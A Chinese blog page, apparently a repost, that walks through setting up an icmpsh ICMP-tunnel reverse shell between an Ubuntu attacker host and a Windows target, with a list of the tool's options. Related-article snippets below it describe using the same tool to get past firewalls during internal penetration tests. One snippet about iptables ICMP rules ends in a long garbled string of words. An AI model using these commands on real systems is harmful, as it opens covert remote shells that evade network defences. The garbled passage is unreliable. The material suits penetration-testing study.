icmp隧道--icmpsh

最新推荐文章于 2025-05-01 11:43:53 发布
最新推荐文章于 2025-05-01 11:43:53 发布
阅读量327 收藏 1
点赞数
文章标签: 操作系统 python
原文链接:http://www.cnblogs.com/mrhonest/p/11578300.html
版权

本地:ubantu

目标主机:windows

在ubantu上关闭自带的icmp回应

sysctl -w net.ipv4.icmp_echo_ighore_all=1

ubantu上启动

  • pip install impacket
  • python icmpsh_m.py ubantuIP WindowsIP

windows上

icmpsh.exe -t UbantuIP

详细命令

-t  host主机ip地址,用于向其发送ping请求。 此选项是强制性的!
-r  发送包含字符串“ Test1234”的单个测试icmp请求,然后退出。
                    这是用于测试连接的。
-d  毫秒请求之间的延迟(以毫秒为单位)
-o  毫秒响应超时(以毫秒为单位)。 如果未及时收到回复,
                    从站将增加一个空白计数器。 如果该计数器达到极限,则从站将退出。
                    如果收到响应,则计数器设置回0。
-b  空格数限制(退出前未答复的icmp请求
-s  字节最大数据缓冲区大小(以字节为单位)

1431916-20190924145834117-1684489532.png

转载于:https://www.cnblogs.com/mrhonest/p/11578300.html

ddr12231
关注
利用icmpsh建立icmp隧道反弹shell
xj28555的博客
09-25 819
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git 我们可以直接用git克隆过来git clonehttps://github.com/inquisb/icmpsh.git 然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问 pip2 install impacket 接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。 sysc.
icmpsh建立ICMP隧道
大方子
01-27 4830
Kali:192.168.61.145 Win7:192.168.61.128 Kali上先下载icmpsh git clone https://github.com/inquisb/icmpsh.git 安装python-impacket apt-get install python-impacket 关闭Kali系统自己的ping回复(实验完成后,记得设回0) 然后进入icmpsh文件夹内执行 # python icmpsh_m.py [攻击机IP][目标IP] python icmpsh_m
icmp隧道
最新发布
m0_74849202的博客
05-01 583
在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙一般不会屏蔽ping的数据包),实现不受限制的访问访问。每ping下就会有两个数据包,先是request再是repley,所以ping完后多了总计八个数据包,大小为74字节,黑色的是连接超时的,用linux ping则是98字节,有点小差异。
icmp报文_ICMP隧道
weixin_39980596的博客
11-22 234
2018年小黑考上了某三本大学的计算机专业,在骄阳似火的9月为了喝阔乐,和办宽带上网,小黑选择了前者。校园宿舍用的是CMCC网络,需要进行认证才能上百度。为了一边喝阔乐一边上网,小黑开始了折腾的不归路。下面简单的分析一哈ICMP隧道是如何建立和使用的。[1]这都是2015年的技术了~第一步:服务端启动隧道第二步:查看服务端的隧道IP、路由等信息服务端IP地址多了一个10.0.1.1,这就是咱们的隧...
icmpsh使用
守拙的博客
07-11 1156
ICMP隧道:将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙通常不会过滤ping数据包),通常用于内网攻击中的绕过防火墙建立C2tongda。 常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。 下载地址:https://github.com/bdamele/icmpsh 使用前提: 目标主机为windows系统 本地机器安装python2环境,安装impacket类库 利用icmpsh
内网穿透_ICMP_icmpsh
tubug的博客
03-28 1227
常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。数据包(例如:ping操作)的传输过程中,当目标主机不可达,或者请求超时,都是ICMP在运作(生成相应的错误信息)这样,当其他设备向你的机器发送 ICMP 请求时,icmpsh 可以截获这些请求并作出响应,而不是系统本身去响应。使用 icmpsh 工具时,它会监听网络上的 ICMP 请求,并模拟系统的 ICMP 去响应。为了防止系统本身去响应icmp,所以要关闭本机的icmp响应。
ICMP隧道icmpsh利用
Zlirving_的博客
02-10 774
ICMP隧道 icmp隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备进行通信肯定需要开放端口,而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的icmp请求。 利用价值,在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的。 icmpsh icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,
内网渗透之icmp隧道传输
qq_55894976的博客
08-16 1048
为什么要建立隧道在实际的网络中,通常会通过各种边界设备·软/硬件防火墙、入侵检测系统来检查对外连接的情况,如果发现异常,会对通信进行阻断。​# 什么是隧道就是一种绕过端口屏蔽的方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信,当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上​#常见的隧道列举如下:网络层:ipv6隧道 icmp隧道 gre隧道传输层:TCP隧道 UDP隧道 常规端口转发。
【内网流量操控技术六】icmp隧道icmpsh
redwand的博客
02-11 1857
今天是大年三十,先给大家拜个早年,虽然是年末最后一天,但对于有技术信仰的我们来说,其实每一天都是第0天,遂积跬步,记录一篇。前面我们学习了ssh隧道、dns隧道,这些隧道从tcp/ip七层协议来看,多是通过应用层或传输层协议穿透防火墙。那么当防火墙如果不开任何端口,我们应该如何穿透绕过防火墙出站规则呢,本节我们通过学习icmpsh来解决服务器未开端口时,如何通过icmp隧道穿透防火墙,其原理虽然简单,但动手一试发现有很多坑值得避免。
内网渗透系列:内网隧道icmpsh
闵行小鱼塘
04-10 1644
本文研究ICMP隧道的一个工具,icmpsh
ICMP隧道
weixin_74171325的博客
07-08 410
后台私信找我获取工具。
【渗透测试】ICMP隧道技术之icmpsh使用
SunnyCat
09-28 2427
【渗透测试】ICMP隧道技术之icmpsh使用 一、使用场景 icmp隧道技术多用于服务器未开启任何端口时,但能够通过icmp协议通讯,即能够ping通对方 二、icmpsh icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。 这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)
内网渗透系列:内网隧道ICMP隧道
闵行小鱼塘
07-06 3505
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习ICMP隧道
【渗透测试】ICMP隧道技术之icmpsh使用(含流量分析)
SunnyCat
09-29 3173
目录一、环境二、工具三、操作1、CentOS72、Win103、反弹成功四、C2流量分析1、正常的icmp流量2、恶意的icmp流量3、C2数据总结 一、环境 Win10:10.95.16.112 CentOS7:10.95.16.103 二、工具 icmpsh python2 三、操作 win10关闭防火墙,病毒检测,不然icmpsh.exe会被自动删除 centOS7安装python2对应的库文件用于支持icmpsh工具 pip2 install impacket 1、CentOS7 sysctl
网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)
谢公子的博客
03-05 6266
目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道(Icmptunnel) ICMP隧道 ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相...
DROP icmp -- 0.0.0.0/0 0.0.0.0/0 icmp type 13DROP icmp -- 0.0.0.0/0 0.0.0.0/0 icmp type 14
04-08
### 如何通过iptables阻止特定ICMP类型的数据包 为了阻止特定类型的ICMP数据包,可以通过`iptables`定义规则来过滤这些流量。具体来说,可以使用`--icmp-type`选项指定要阻断的ICMP类型[^1]。 以下是针对ICMP类型13(Timestamp Request)和类型14(Timestamp Reply)创建规则的方法: #### 创建DROP规则 以下命令用于阻止来自任何源地址的ICMP Timestamp请求(Type 13)和响应(Type 14)进入服务器: ```bash sudo iptables -A INPUT -p icmp --icmp-type 13 -j DROP sudo iptables -A INPUT -p icmp --icmp-type 14 -j DROP ``` 上述两条规则分别对应于ICMP Type 13和Type 14的数据包。`-p icmp`指定了协议为ICMP,而`--icmp-type`则进一步限定了具体的ICMP消息类型[^2]。 #### 测试与验证 完成规则添加之后,可通过发送相应的ICMP数据包并观察其被丢弃的情况来进行测试。例如,利用自定义工具或者脚本尝试触发Timestamp ICMP消息,并确认目标主机无回应行为。 需要注意的是,在实际部署前最好先保存现有防火墙设置以便回滚操作失败时恢复原状: ```bash service iptables save ``` 这一步骤确保了即使系统重启后新增加的防护策略依然有效[^3]。 另外值得注意的一点是,当有新的连接建立时,比如SSH登录或HTTP访问网站等动作发生之前就已经存在允许此类通讯的相关规则,则即便后续追加了一条全面封锁所有传入网络流量(`-A INPUT -j DROP`) 的指令也不会影响到先前已许可的服务功能正常运作情况[^4]。 最后提醒一下关于查看当前生效中的IPTables列表项内容可执行如下命令获取详细信息: ```bash iptables -nL ``` 该命令提供了即时快照式的展示效果而非动态更新模式下的连续监控服务状态变化趋势图解说明文档参考资料链接地址位置方向指引导航地图路线规划方案设计构思创意灵感来源出处背景故事历史沿革发展脉络逻辑推理分析论证结论总结概述要点提炼精炼概括综合归纳整理分类排序排列组合变换转换演变进化退化衰退消亡灭亡终结结束完结完毕成就成果收获体会感悟心得经验教训警示告诫忠告建议提议推荐鼓励激励鞭策促进推动带动引领指导教导教育培养训练锻炼实践实习实验探索研究调查考察参观访问交流沟通联系互动合作协作配合协调平衡和谐统一融合汇合集合聚集集中专注专心致志全力以赴全心投入倾尽全力竭尽所能尽力而为不遗余力毫不保留不留余地无所不用其极穷尽可能千方百
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值